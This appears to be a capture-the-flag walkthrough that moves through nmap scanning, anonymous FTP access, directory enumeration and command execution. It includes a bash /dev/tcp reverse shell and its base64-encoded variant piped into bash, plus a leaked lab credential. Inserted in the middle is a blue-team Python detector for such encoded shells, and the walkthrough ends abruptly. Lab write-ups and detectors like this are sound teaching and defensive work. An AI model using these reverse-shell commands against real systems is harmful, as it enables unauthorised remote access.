Scanning the host with nmap -A -T4 -p- 192.168.1.15 -vv
Anonymous login is allowed on the FTP service on port 21, so let's try it.
With username anonymous and password anonymous we can see there are 3 files; we can download them one by one using the GET command. All of them are text files.
File games.txt: oh and I forgot to tell you I've setup a game for you on port 1337. See if you can reach to the final level and get the prize.
File message.txt: @nitish81299 I am going on holidays for few days, please take care of all the work. And don't mess up anything.
File creds.txt: nitu:81299
The game needs to be solved in order to give us the gift, but only after 1000 tries, which we don't have the time for, so let's move on to something else.
Let's start gobuster or dirsearch on port number 7331.
Let's visit the directories we found and see if there is something interesting.
Simply type id and whoami to get some information.
Trying to get a shell using nc is not working, so we have to encode the shell command as base64 (googled it) in order to pass it to the shell on the host in a form it accepts:
bash -i >& /dev/tcp/192.168.1.11/443 0>&1 // this is the shell as we know it
now we encode it in base64:
echo "bash -i >& /dev/tcp/192.168.1.11/443 0>&1" | base64
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEvNDQzIDA+JjE=|base64 -d|bash // this is the same shell, base64-encoded and decoded back on the host
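From the blue-team side, the trick above is what a process-creation or auditd EXECVE record shows: a long base64 blob piped through base64 -d into bash. The following is an added example, not part of the original walkthrough, that decodes such blobs in command lines and flags the /dev/tcp reverse shell pattern; the sample command lines are constructed.

```python
import base64
import re

# Constructed sample command lines, as a process-creation log would show them.
# The second is the encoded reverse shell from this walkthrough; the rest are noise.
SAMPLE_CMDLINES = [
    "ls -la /home/nitish",
    "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEvNDQzIDA+JjE=|base64 -d|bash",
    "python3 -c 'print(1)'",
]

# A bash reverse shell of the form used above: /dev/tcp/<ip>/<port>.
REVERSE_SHELL_RE = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
# A long run of base64 alphabet characters with optional padding.
B64_TOKEN_RE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
# "base64 -d" (or --decode) whose output is piped straight into a shell.
DECODE_TO_SHELL_RE = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:ba)?sh\b")


def decode_base64_tokens(cmdline):
    """Return the decoded text of every token that is valid base64 text."""
    decoded = []
    # Split on whitespace and shell metacharacters so "BLOB|base64" still
    # yields the bare blob even when no spaces were typed around the pipe.
    for tok in re.split(r"[\s|;&()]+", cmdline):
        if not B64_TOKEN_RE.match(tok):
            continue
        try:
            text = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            decoded.append(text)
    return decoded


def inspect_cmdline(cmdline):
    """Flag a command line that decodes base64 into a shell or hides /dev/tcp."""
    finding = {"decoded": decode_base64_tokens(cmdline),
               "decode_to_shell": bool(DECODE_TO_SHELL_RE.search(cmdline)),
               "reverse_shell": None}
    for text in finding["decoded"]:
        m = REVERSE_SHELL_RE.search(text)
        if m:
            finding["reverse_shell"] = (m.group(1), int(m.group(2)))
    return finding


def scan(cmdlines):
    """Return (cmdline, finding) pairs worth alerting on."""
    alerts = []
    for c in cmdlines:
        f = inspect_cmdline(c)
        if f["decode_to_shell"] or f["reverse_shell"]:
            alerts.append((c, f))
    return alerts
```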
There is a directory at "/home/nitish/.dev/" containing a file named creds.txt.
The second choice doesn't work no matter what number I guess, so I looked at sam's directory, where there is a .pyc file. I downloaded it to my machine to read it (it is a compiled Python file) and opened it in an online Python decompiler.
The answer is num